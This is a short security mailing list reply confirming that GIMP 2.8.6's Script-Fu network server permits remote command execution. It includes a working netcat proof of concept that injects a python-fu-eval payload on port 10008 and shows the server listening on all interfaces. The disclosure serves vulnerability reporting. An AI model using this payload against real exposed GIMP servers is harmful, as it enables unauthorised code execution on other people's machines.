oss-sec mailing list archives
Re: GIMP Scriptfu Python Remote Command Execution
From: Sebastian Pipping <sebastian () pipping org>
Date: Sun, 15 Sep 2013 03:33:44 +0200
On 16.08.2012 23:00, research wrote:
Affected Products ================= GIMP 2.6 branch (Windows or Linux builds) Non-Affected Products ===================== The Scriptfu network server component does not currently work in the GIMP 2.8 branch (Windows or Linux builds).
I was able to verify that vulnerability with Gimp 2.8.6 on my local machine so at least some versions of the Gimp 2.8.x series seem affected to me. This is my shell session: $ rm /tmp/owned $ p='(python-fu-eval 0 "open('"'"'/tmp/owned'"'"', '"'"'w'"'"')")'; printf "G\x0\x2c%s" "${p}" | nc -w 1 localhost 10008 | od -c 0000000 G \0 \0 \a S u c c e s s 0000013 $ ls -al /tmp/owned -rw-r--r-- 1 user user 0 Sep 15 02:56 /tmp/owned The server started from the GUI seems to be listening anywhere: $ netstat -tulpen 2>/dev/null | fgrep script-fu tcp 0 0 0.0.0.0:10008 0.0.0.0:* LISTEN 1000 102934 6392/script-fu Best, Sebastian
Current thread:
- Re: GIMP Scriptfu Python Remote Command Execution Sebastian Pipping (Sep 14)